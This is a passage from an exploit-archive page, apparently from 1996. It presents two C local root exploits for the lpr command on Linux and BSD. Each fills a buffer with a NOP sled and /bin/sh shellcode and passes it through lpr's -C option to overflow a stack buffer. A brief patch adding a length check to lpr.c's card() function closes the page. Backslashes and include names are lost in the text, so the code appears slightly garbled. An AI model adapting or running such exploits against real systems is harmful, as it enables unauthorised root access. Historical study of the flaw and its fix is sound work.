[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BSD and Linux lpr Command Local Root Exploit
# Published : 1996-10-25
# Author : Vadim Kolontsov
# Previous Title : Xt Library Local Root Command Execution Exploit
# Next Title : jaZip 0.32-2 Local Buffer Overflow Exploit


-------------------------------------- linux_lpr_exploit.c ----------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07"
                        "x89x56x0fxb8x1bx56x34x12x35x10x56x34x12"
                        "x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80xe8"
                        "xd7xffxffxff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------------------------- bsd_lpr_exploit.c ------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
   "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
   "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
   "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------

  Here is a little patch -- see file lpr.c, function card():
("!!" marks added lines)

--------------------------------------------------------------------------
static void card(c, p2)
        register int c;
        register char *p2;
{
        char buf[BUFSIZ];
        register char *p1 = buf;
        register int len = 2;


        if (strlen(p2) > BUFSIZ-2)                     /* !! */
        {                                              /* !! */
                printf("No, thanks...n");             /* !! */
                exit(1);                               /* !! */
        }
        *p1++ = c;
        while ((c = *p2++) != '') {
                *p1++ = (c == 'n') ? ' ' : c;
                len++;
        }
        *p1++ = 'n';
        write(tfd, buf, len);
}


// www.Syue.com [1996-10-25]